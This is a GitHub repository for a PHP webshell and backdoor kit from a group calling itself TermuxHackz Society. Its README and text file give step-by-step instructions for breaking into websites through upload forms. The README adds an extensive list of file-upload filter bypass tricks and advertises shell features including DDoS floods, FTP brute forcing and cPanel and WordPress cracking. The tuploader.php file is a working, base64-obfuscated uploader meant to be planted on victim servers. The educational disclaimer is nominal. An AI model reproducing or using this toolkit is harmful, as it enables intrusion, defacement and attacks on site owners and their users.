├── LICENSE
├── README.md
├── TermuxHackz-WebShell
├── Payload_image.png
├── READ_ME_FIRST!!.txt
├── config
├── ths1335.pHp
└── tuploader.php
├── donations.jpeg
├── images
├── qrcode
└── received_1065724630950464.jpeg
├── ths1.png
├── ths2.png
└── ths3.png
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 AnonyminHack5
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Php-Webshell/Backdoor
2 |
3 | A PHP webshell created by us TermuxHackz Society. For educational and/or testing purposes only.
4 | Can also be used for ctf challenges, which has uploader and main shell. (ths1335.php)
5 |
6 | # Note
7 | #### [+] Always investigate malware in a secure environment. This means: separately from your network and in a virtual machine!
8 | #### [+] Some backdoors may be backdoored (yes, really). Don't ever use this for any malicious purposes.
9 | #### [+] The backdoors follow the format: Backdoorname_SHA1.php, granted the name of the backdoor is known
10 | #### [+] The folder TermuxHackz Webshell contains the webshell (uploader and main shell[ths1335 shell]).
11 | #### [+] Dont just be a defacer alone!, do cool shits with the webshell. But can also be used for defacing
12 |
13 | # Created by
14 | TermuxHackz Society Team Members - AnonyminHack5
15 |
16 | Ths1335.php is a powerful webshell which has several and multiple features which are useful for spammers, defacers and also
17 | useful for those who loves to try cool shits too haha ^_^. It contains, Fake Mailer, Whois scan, iplookup, Cracking Cpanel, Whm, Admin Panel Finder and so much more. This help bypass site security and not like other shells.
18 |
19 | # Steps to use this webshell
20 | ```
21 | 1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc)
22 | 2) Look for upload section
23 | 3) First try to upload the Tuploader.php into the site
24 | If the site restricts php files, and says only png, jpeg or jpg images allowed
25 | Then next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc
26 |
27 |
28 | The payload-image.png is an injected code for the php file
29 | So once the png image has been successfully uploaded
30 | But if the payload-image doesnt work. Use some file upload bypass tricks
31 |
32 | 4) Copy the image/shell location
33 | 5) Open in a tab
34 | 6) Then once you see the uploader
35 | 7) Upload the main shell which is the ths1335.php
36 | 8) Then you can use the shell..
37 |
38 | Hahah, make sure you use with care!!
39 | ```
40 | # File Upload Bypass
41 | File Upload General Methodology
42 | Other useful extensions:
43 | PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
44 | ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
45 | Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
46 | Coldfusion: .cfm, .cfml, .cfc, .dbm
47 | Flash: .swf
48 | Perl: .pl, .cgi
49 | Erlang Yaws Web Server: .yaws
50 |
51 | Bypass file extensions checks
52 | 1) If they apply, the check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr ..
53 | 2) Check adding a valid extension before the execution extension (use previous extensions also):
54 |
55 | file.png.php
56 | file.png.Php5
57 |
58 |
59 | 3) Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously motioned extensions)
60 |
61 |
62 | file.php%20
63 | file.php%0a
64 | file.php%00
65 | file.php%0d%0a
66 | file.php/
67 | file.php.\
68 | file.
69 | file.php....
70 | file.pHp5...
71 |
72 |
73 | 4) Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
74 |
75 |
76 | file.png.php
77 | file.png.pHp5
78 | file.php%00.png
79 | file.php\x00.png
80 | file.php%0a.png
81 | file.php%0d%0a.png
82 | flile.phpJunk123png
83 |
84 |
85 | 5) Add another layer of extensions to the previous check:
86 |
87 | file.png.jpg.php
88 | file.php%00.png%00.jpg
89 |
90 |
91 | 6) Try to put the exec extension before the valid extension and pray so the server is misconfigured. **(useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php** will execute code):
92 |
93 | ex: file.php.png
94 |
95 |
96 | 7) Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “::$data” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
97 | 8) Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
98 |
99 | ```
100 | # Linux maximum 255 bytes
101 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
102 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
103 | # Upload the file and check response how many characters it alllows. Let's say 236
104 | python -c 'print "A" * 232'
105 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
106 | # Make the payload
107 | AAA<--SNIP 232 A-->AAA.php.png
108 | ```
109 |
110 | Bypass Content-Type & magic number
111 | 1) Bypass Content-Type checks by setting the value of the Content-Type header to: image/png , text/plain , application/octet-stream
112 |
113 | >> Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt
114 |
115 | 2) Bypass magic number check by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata: exiftool -Comment="
116 |
117 |
118 | Or you can try other tricks you know that might work. Haha
119 |
120 | # Some features of ths1335 Shell
121 | 1) File Manager
122 | 2) Dumping SQL database
123 | 3) Find admin panel page
124 | 4) Execute ssh commands on remote server
125 | 5) TCP and UDP flood ddos
126 | 6) CGI Shell
127 | 7) Ftp brute force
128 | 8) Cracking Cpanels and Whmpanels
129 | 9) Crack WordPress sites and change all usernames and password
130 | 10) Code Injector
131 | 11) And so much fuckin more hahahaha
132 |
133 |
134 | # Ths1335 Shell Images
135 | 
136 |
137 | 
138 |
139 | 
140 |
141 | # License
142 | ths1335.php shell is under the MIT license. This webshell is free for all use and for home and educational usages as well. Thanks to our team of skilled programmers hahaha.
143 |
144 | Incase you dont like to clone from github, haha, you can download the TermuxHackz Webshell zip from mediafire.
145 | Download here:- Download TermuxHackz WebShell here.
146 |
147 | Kindly star or fork this repo, to support us for this wonderful project
148 |
149 | # Donate
150 | 
151 | Donate to us if you love and appreciate the project. Donate here. Thanks for donations....
152 |
153 |
154 | # Version
155 | ```
156 | Version 1.0
157 | ```
158 |
159 | # Join our groups
160 | Join our Telegram group: here
161 | Visit our Site
162 | Join our facebook group: here
163 | Join our telegram Channel also by scanning the qr code below
164 |
165 | 
166 |
167 | # Notice Bugs?
168 | If you use our webshell and you notice bugs in em feel free to email me those bugs and We will try fix them.
169 | Report those bugs to me here.
170 |
171 | Thanks alot for the support
172 |
173 | # Faqs
174 | ##### 1) Some features doesn't work?
175 | If you notice that some features of the shell doesnt work, Try using a linux system with a good internet connection 📶 and try again. It should work. Using a windows system with this powerful webshell is limited. Thanks :)
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/Payload_image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/TermuxHackz-WebShell/Payload_image.png
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/READ_ME_FIRST!!.txt:
--------------------------------------------------------------------------------
1 | This webshell was created by TermuxHackz Society Team Members
2 |
3 | Steps to use this shell
4 |
5 | 1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc)
6 | 2) Look for upload section
7 | 3) First try to upload the Tuploader.php into the site
8 | If the site restricts php files, and says only png, jpeg or jpg images allowed
9 | Then next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc
10 |
11 |
12 | The payload-image.png is an injected code for the php file
13 | So once the png image has been successfully uploaded
14 | But if the payload-image doesnt work. Use some file upload bypass tricks
15 |
16 | 4) Copy the image/shell location
17 | 5) Open in a tab
18 | 6) Then once you see the uploader
19 | 7) Upload the main shell which is the ths1335.php
20 | 8) Then you can use the shell..
21 |
22 | Hahah, make sure you use with care!!
23 |
24 | /////
25 | Created by TermuxHackz Society Team Members...
26 | /////
27 | Fuck the system
28 | Breaking web firewalls!!!
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/config:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/tuploader.php:
--------------------------------------------------------------------------------
1 | ".base64_decode("DQo8P3BocCAkeyJceDQ3TFx4NGZCXHg0MVx4NGNceDUzIn1bInlceDYyXHg3Mlx4NjhvXHg2NWFceDYzXHg2N1x4N2F5XHg2ZHVceDVmc1x4NjJceDZkeFx4NzhceDZib1x4NzhceDVmXHg3MFx4NjJ3XHg3M21ceDczdFx4NWZkXHg2N1x4NzN2Il09Il9ceDUzRVx4NTJWXHg0NVIiOyR7Ilx4NDdceDRjT1x4NDJBXHg0Y1MifVsicFx4NzZceDVmXHg2MWtceDc2ZVx4NjhhXHg2NHhceDYyXHg2MVx4NjlceDZmeFx4NjZceDdhclx4NWZceDcwX1x4Nzl1XHg3NG1ceDY3XHg3Mm5ceDc4cFx4NjMiXT0iXHg1ZkZceDQ5XHg0Y0VceDUzIjskeyJceDQ3TFx4NGZCXHg0MUxceDUzIn1bIlx4NjVceDZkXHg3YXhceDY1XHg2ZW5ceDZmeFx4NjdvXHg2OG5ceDVmYlx4NzZceDY4ZFx4NjhceDZkX1x4NjFmXHg2NCJdPSJceDZlZVx4NzduXHg2MW1ceDY1IjskeyJceDQ3TFx4NGZceDQyXHg0MUxceDUzIn1bIlx4NzFwXHg3M2RceDY3Z1x4NzJiXHg2YXZceDZkclx4NjRlXHg2NWtceDc2aFx4NzhceDc2cFx4NWZceDZicVx4N2F0XHg2MiJdPSJceDY1clx4NzJvXHg3Mlx4NzMiOyR7IkdceDRjT1x4NDJBXHg0Y1x4NTMifVsiXHg2M21ceDcydlx4NWZpXHg3NVx4NmRceDc2d1x4NjhceDZhXHg3OXVceDc4d1x4NzduXHg2ZFx4NjdceDY0c1x4NzNceDZmaFx4Nzd4Il09Ilx4NjZpXHg2Y1x4NjVfXHg2NXhceDc0IjskeyJceDQ3XHg0Y1x4NGZceDQyQVx4NGNceDUzIn1bIndceDc0XHg3YVx4NmVoXHg2N1x4NzJkXHg2N1x4NzByXHg2YWtceDY2Y1x4NmFmXHg3NGlceDZiX1x4NzdceDZjYVx4NzciXT0iXHg2NXhceDc0ZVx4NmVceDczaVx4NmZceDZlcyI7Pz48P3BocCAgID8+PCFET0NUWVBFIGh0bWw+PG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCBpbml0aWFsLXNjYWxlPTEiPjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij48aGVhZD48dGl0bGU+LS0tWzw8LVQtVXBsb2FkZXItLT4+XS0tLS08L3RpdGxlPjwvaGVhZD48c3R5bGU+LmxlZnQgewl0ZXh0LWFsaWduOiBsZWZ0Owljb2xvcjogd2hpdGU7CWZvbnQtc2l6ZTogMTZweDsNCn08L3N0eWxlPjxodG1sPjxib2R5PjxzdHlsZT4qIHsNCnBhZGRpbmc6IDA7DQptYXJnaW46IDA7DQpmb250LWZhbWlseTogVGFob21hLCBWZXJkYW5hLCBzYW5zLXNlcmlmOw0KfQ0KYm9keSB7DQpjb2xvcjogbGlnaHRncmVlbjsNCmZvbnQtZmFtaWx5OiBUYWhvbWEsIFZlcmRhbmEsIHNhbnMtc2VyaWY7DQp9DQouY29udGFpbmVyIHsNCmRpc3BsYXk6IGJsb2NrOw0KfQ0KLnRleHQxIHsNCmNvbG9yOiBvcmFuZ2U7DQpmb250LXNpemU6IDYwcHg7DQpmb250LXdlaWdodDogOTAwOw0KZm9udC1mYW1pbHk6IHNlcmlmOw0KdGV4dC1hbGlnbjogY2VudGVyOw0KbGV0dGVyLXNwYWNpbmc6IDZweDsNCmFuaW1hdGlvbjogZWZmZWN0IDJzIGxpbmVhciBpbmZpbml0ZTsNCmN1cnNvcjogcG9pbnRlcjsNCn0NCkBrZXlmcmFtZXMgZWZmZWN0IHsJMCUgewljb2xvcjogb3JhbmdlOwktd2Via2l0LWJhY2tncm91bmQtY2xpcDogdGV4dDsJfQkyMCUgewljb2xvcjogbGlnaHRncmVlbjsJZm9udC13ZWlnaHQ6IGJvbGQ7CX0JNTAlIHsJY29sb3I6ICMzY2U3ZDc7CS13ZWJraXQtYmFja2dyb3VuZC1jbGlwOiB0ZXh0Owl9CTYwJSB7CWNvbG9yOiBibHVlOwktd2Via2l0LWJhY2tncm91bmQtY2xpcDogdGV4dDsJfQk3MCUgewljb2xvcjogY3lhbjsJfQkxMDAlIHsJY29sb3I6IGxpbmVhci1ncmFkaWVudCgjM2NlN2Q3LCAjMDAwZmZmKTsJLXdlYmtpdC1iYWNrZ3JvdW5kLWNsaXA6IHRleHQ7CX0NCn0NCmEgewljb2xvcjogbGlnaHRibHVlOwl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQp9PC9zdHlsZT48YnI+PGJyPjxzdHlsZT5ib2R5IHsNCmJhY2tncm91bmQ6ICMzMzM7DQpmb250LWZhbWlseTogIkx1Y2lkYSBDb25zb2xlIiwgIkNvdXJpZXIgTmV3IiwgbW9ub3NwYWNlOw0KZm9udC1zaXplOiAxNnB4Ow0KdGV4dC1hbGlnbjogY2VudGVyOw0KY29sb3I6IGxpZ2h0Z3JlZW47DQp9DQouYnV0dG9uLTMgeyBhcHBlYXJhbmNlOiBub25lOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMmVhNDRmOyBib3JkZXI6IDFweCBzb2xpZCByZ2JhKDI3LCAzMSwgMzUsIC4xNSk7IGJvcmRlci1yYWRpdXM6IDZweDsgYm94LXNoYWRvdzogcmdiYSgyNywgMzEsIDM1LCAuMSkgMCAxcHggMDsgYm94LXNpemluZzogYm9yZGVyLWJveDsgY29sb3I6ICNmZmY7IGN1cnNvcjogcG9pbnRlcjsgZGlzcGxheTogaW5saW5lLWJsb2NrOyBmb250LWZhbWlseTogLWFwcGxlLXN5c3RlbSxzeXN0ZW0tdWksIlNlZ29lIFVJIixIZWx2ZXRpY2EsQXJpYWwsc2Fucy1zZXJpZiwiQXBwbGUgQ29sb3IgRW1vamkiLCJTZWdvZSBVSSBFbW9qaSI7IGZvbnQtc2l6ZTogMTRweDsgZm9udC13ZWlnaHQ6IDYwMDsgbGluZS1oZWlnaHQ6IDIwcHg7IHBhZGRpbmc6IDZweCAxNnB4OyBwb3NpdGlvbjogcmVsYXRpdmU7IHRleHQtYWxpZ246IGNlbnRlcjsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyB1c2VyLXNlbGVjdDogbm9uZTsgLXdlYmtpdC11c2VyLXNlbGVjdDogbm9uZTsgdG91Y2gtYWN0aW9uOiBtYW5pcHVsYXRpb247IHZlcnRpY2FsLWFsaWduOiBtaWRkbGU7IHdoaXRlLXNwYWNlOiBub3dyYXA7DQp9DQouYnV0dG9uLTM6Zm9jdXM6bm90KDpmb2N1cy12aXNpYmxlKTpub3QoLmZvY3VzLXZpc2libGUpIHsgYm94LXNoYWRvdzogbm9uZTsgb3V0bGluZTogbm9uZTsNCn0NCi5idXR0b24tMzpob3ZlciB7IGJhY2tncm91bmQtY29sb3I6ICMyYzk3NGI7DQp9DQouYnV0dG9uLTM6Zm9jdXMgeyBib3gtc2hhZG93OiByZ2JhKDQ2LCAxNjQsIDc5LCAuNCkgMCAwIDAgM3B4OyBvdXRsaW5lOiBub25lOw0KfQ0KLmJ1dHRvbi0zOmRpc2FibGVkIHsgYmFja2dyb3VuZC1jb2xvcjogIzk0ZDNhMjsgYm9yZGVyLWNvbG9yOiByZ2JhKDI3LCAzMSwgMzUsIC4xKTsgY29sb3I6IHJnYmEoMjU1LCAyNTUsIDI1NSwgLjgpOyBjdXJzb3I6IGRlZmF1bHQ7DQp9DQouYnV0dG9uLTM6YWN0aXZlIHsgYmFja2dyb3VuZC1jb2xvcjogIzI5OGU0NjsgYm94LXNoYWRvdzogcmdiYSgyMCwgNzAsIDMyLCAuMikgMCAxcHggMCBpbnNldDsNCn08L3N0eWxlPjw/cGhwICBlcnJvcl9yZXBvcnRpbmcoMCk7aW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDApID8+PGgzIGNsYXNzPSJ0ZXh0MSI+VC1VUExPQURFUjwvaDM+PHNwYW4gY2xhc3M9InRleHQyIj5DcmVhdGVkIGJ5IFRlcm11eEhhY2t6IFNvY2lldHk8L3NwYW4+PGZvcm0gYWN0aW9uPSI8P3BocCBlY2hvICR7JHsiR1x4NGNceDRmXHg0MkFceDRjXHg1MyJ9WyJ5XHg2Mlx4NzJceDY4b1x4NjVhXHg2M1x4NjdceDdheVx4NmR1XHg1ZnNceDYyXHg2ZHhceDc4XHg2Ym9ceDc4XHg1Zlx4NzBceDYyd1x4NzNtXHg3M3RceDVmZFx4NjdceDczdiJdfVsnUEhQX1NFTEYnXSA/PiIgbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj48bGFiZWwgY2xhc3M9ImNvbC1tZC0zIGNvbnRyb2wtbGFiZWwiPlVwbG9hZCBmaWxlPC9sYWJlbD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iYXR0YWNobWVudCIgY2xhc3M9ImZvcm0tY29udHJvbC1maWxlIiAvPjxidXR0b24gdHlwZT0ic3VibWl0IiByb2xlPSJidXR0b24iIGNsYXNzPSJidXR0b24tMyI+VXBsb2FkPC9idXR0b24+PC9mb3JtPjxici8+PGJyLz48YnI+PGJyPjw/cGhwIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJHskeyJHXHg0Y09ceDQyQVx4NGNTIn1bInBceDc2XHg1Zlx4NjFrXHg3NmVceDY4YVx4NjR4XHg2Mlx4NjFceDY5XHg2ZnhceDY2XHg3YXJceDVmXHg3MF9ceDc5dVx4NzRtXHg2N1x4NzJuXHg3OHBceDYzIl19WydhdHRhY2htZW50J11bJ3RtcF9uYW1lJ10pKXskeyR7Ilx4NDdMXHg0ZkJceDQxTFx4NTMifVsiXHg2NVx4NmRceDdheFx4NjVceDZlblx4NmZ4XHg2N29ceDY4blx4NWZiXHg3Nlx4NjhkXHg2OFx4NmRfXHg2MWZceDY0Il19PWRpcm5hbWUoX19GSUxFX18pLiJceDJmIi5iYXNlbmFtZSgkeyR7IkdceDRjXHg0ZkJceDQxTFx4NTMifVsicFx4NzZceDVmXHg2MWtceDc2ZVx4NjhhXHg2NHhceDYyXHg2MVx4NjlceDZmeFx4NjZceDdhclx4NWZceDcwX1x4Nzl1XHg3NG1ceDY3XHg3Mm5ceDc4cFx4NjMiXX1bJ2F0dGFjaG1lbnQnXVsnbmFtZSddKTtpZigkeyR7IkdceDRjXHg0ZkJceDQxTFx4NTMifVsicFx4NzZceDVmXHg2MWtceDc2ZVx4NjhhXHg2NHhceDYyXHg2MVx4NjlceDZmeFx4NjZceDdhclx4NWZceDcwX1x4Nzl1XHg3NG1ceDY3XHg3Mm5ceDc4cFx4NjMiXX1bJ2F0dGFjaG1lbnQnXVsnc2l6ZSddPjEwNzM3NDE4MjQpeyR7JHsiR1x4NGNPXHg0MkFceDRjUyJ9WyJceDcxcFx4NzNkXHg2N2dceDcyYlx4NmF2XHg2ZHJceDY0ZVx4NjVrXHg3NmhceDc4XHg3NnBceDVmXHg2YnFceDdhdFx4NjIiXX1bXT0iXHg0Nlx4NjlceDZjZVx4MjBzXHg2OVx4N2FceDY1IFx4NmRceDc1XHg3M3RceDIwYlx4NjVceDIwZVx4NzhceDYxXHg2M3RceDZjXHg3OVx4MjAxXHg0N1x4NDIiO30keyR7Ilx4NDdMXHg0ZkJceDQxXHg0Y1x4NTMifVsiXHg2M21ceDcydlx4NWZpXHg3NVx4NmRceDc2d1x4NjhceDZhXHg3OXVceDc4d1x4NzduXHg2ZFx4NjdceDY0c1x4NzNceDZmaFx4Nzd4Il19PXN0cnRvbG93ZXIoZW5kKGV4cGxvZGUoJy4nLCR7JHsiXHg0N1x4NGNPXHg0MkFceDRjUyJ9WyJwXHg3Nlx4NWZceDYxa1x4NzZlXHg2OGFceDY0eFx4NjJceDYxXHg2OVx4NmZ4XHg2Nlx4N2FyXHg1Zlx4NzBfXHg3OXVceDc0bVx4NjdceDcyblx4NzhwXHg2MyJdfVsnYXR0YWNobWVudCddWyduYW1lJ10pKSk7JHskeyJHXHg0Y1x4NGZceDQyQVx4NGNTIn1bIndceDc0XHg3YVx4NmVoXHg2N1x4NzJkXHg2N1x4NzByXHg2YWtceDY2Y1x4NmFmXHg3NGlceDZiX1x4NzdceDZjYVx4NzciXX09YXJyYXkoInBkZiIsImRvYyIsImpwZyIsInBuZyIsInR4dCIsInBocCIsIm1wNCIsIm1wMyIsImFzcCIsImRvY3giLCJodG1sIiwibWh0bWwiLCJ6aXAiLCJyYXIiKTtpZihpbl9hcnJheSgkeyR7IkdceDRjT1x4NDJBXHg0Y1x4NTMifVsiXHg2M21ceDcydlx4NWZpXHg3NVx4NmRceDc2d1x4NjhceDZhXHg3OXVceDc4d1x4NzduXHg2ZFx4NjdceDY0c1x4NzNceDZmaFx4Nzd4Il19LCR7JHsiR1x4NGNPXHg0Mlx4NDFceDRjUyJ9WyJ3XHg3NFx4N2FceDZlaFx4NjdceDcyZFx4NjdceDcwclx4NmFrXHg2NmNceDZhZlx4NzRpXHg2Yl9ceDc3XHg2Y2FceDc3Il19KT09PWZhbHNlKXskeyR7Ilx4NDdceDRjT1x4NDJBXHg0Y1MifVsiXHg3MXBceDczZFx4NjdnXHg3MmJceDZhdlx4NmRyXHg2NGVceDY1a1x4NzZoXHg3OFx4NzZwXHg1Zlx4NmJxXHg3YXRceDYyIl19W109IkZceDY5bFx4NjVceDIwZVx4Nzh0XHg2NVx4NmVzXHg2OVx4NmZceDZlIFx4NmVceDZmdFx4MjBhXHg2Y2xceDZmXHg3N2VceDY0LFx4MjBwXHg2Y2VceDYxXHg3M2VceDIwY1x4NjhvXHg2Zlx4NzNlXHgyMFx4NjEgXHg1MERceDQ2LFx4MjBEXHg0ZkNceDJjXHgyMERceDRmQ1x4NTgsXHgyMEpceDUwXHg0N1x4MmNceDIwUFx4NGVHXHgyYyBceDU0XHg1OFRceDIwXHg2Nlx4NjlsXHg2NS4iO31pZihlbXB0eSgkeyR7Ilx4NDdMXHg0ZkJceDQxXHg0Y1x4NTMifVsiXHg3MXBceDczZFx4NjdnXHg3MmJceDZhdlx4NmRyXHg2NGVceDY1a1x4NzZoXHg3OFx4NzZwXHg1Zlx4NmJxXHg3YXRceDYyIl19KT09dHJ1ZSl7aWYoIShtb3ZlX3VwbG9hZGVkX2ZpbGUoJHskeyJceDQ3TFx4NGZceDQyQVx4NGNceDUzIn1bInBceDc2XHg1Zlx4NjFrXHg3NmVceDY4YVx4NjR4XHg2Mlx4NjFceDY5XHg2ZnhceDY2XHg3YXJceDVmXHg3MF9ceDc5dVx4NzRtXHg2N1x4NzJuXHg3OHBceDYzIl19WydhdHRhY2htZW50J11bJ3RtcF9uYW1lJ10sJHskeyJceDQ3TFx4NGZCXHg0MUxceDUzIn1bIlx4NjVceDZkXHg3YXhceDY1XHg2ZW5ceDZmeFx4NjdvXHg2OG5ceDVmYlx4NzZceDY4ZFx4NjhceDZkX1x4NjFmXHg2NCJdfSkpKXtlY2hvICI8XHg3MFx4M2VceDQ1XHg1MlJceDRmUlx4M2EgXHgyMEFceDIwcFx4NzJvXHg2MmxceDY1bVx4MjBceDZmXHg2M2NceDc1XHg3MnJceDY1ZFx4MjBceDY0dVx4NzJceDY5blx4NjcgXHg2Nlx4NjlceDZjXHg2NVx4MjB1XHg3MFx4NmNceDZmXHg2MWRceDIxPFx4MmZceDcwPlxuIjt9ZWxzZXtlY2hvICI8XHg2Mlx4NzJceDNlIjtlY2hvICJceDNjXHg3MFx4M2VceDU0XHg2OFx4NjVceDIwXHg2Nlx4NjlceDZjXHg2NVx4MjBceDY4XHg2MVx4NzNceDIwXHg2Mlx4NjVceDY1XHg2ZVx4MjBceDc1XHg3MFx4NmNceDZmXHg2MVx4NjRceDY1XHg2NFx4MjBceDc0XHg2Zlx4M2FceDIweyR7JHsiXHg0N0xceDRmXHg0Mlx4NDFMXHg1MyJ9WyJceDY1XHg2ZFx4N2F4XHg2NVx4NmVuXHg2ZnhceDY3b1x4NjhuXHg1ZmJceDc2XHg2OGRceDY4XHg2ZF9ceDYxZlx4NjQiXX19XHgzY1x4MmZceDcwXHgzZVxuIjt9fWVsc2V7cHJpbnRfcigkeyR7Ilx4NDdMXHg0ZkJceDQxTFx4NTMifVsiXHg3MXBceDczZFx4NjdnXHg3MmJceDZhdlx4NmRyXHg2NGVceDY1a1x4NzZoXHg3OFx4NzZwXHg1Zlx4NmJxXHg3YXRceDYyIl19KTt9fSA/PjwvYm9keT48L2h0bWw+DQo=")); ?>
--------------------------------------------------------------------------------
/donations.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/donations.jpeg
--------------------------------------------------------------------------------
/images/qrcode:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/images/received_1065724630950464.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/images/received_1065724630950464.jpeg
--------------------------------------------------------------------------------
/ths1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths1.png
--------------------------------------------------------------------------------
/ths2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths2.png
--------------------------------------------------------------------------------
/ths3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths3.png
--------------------------------------------------------------------------------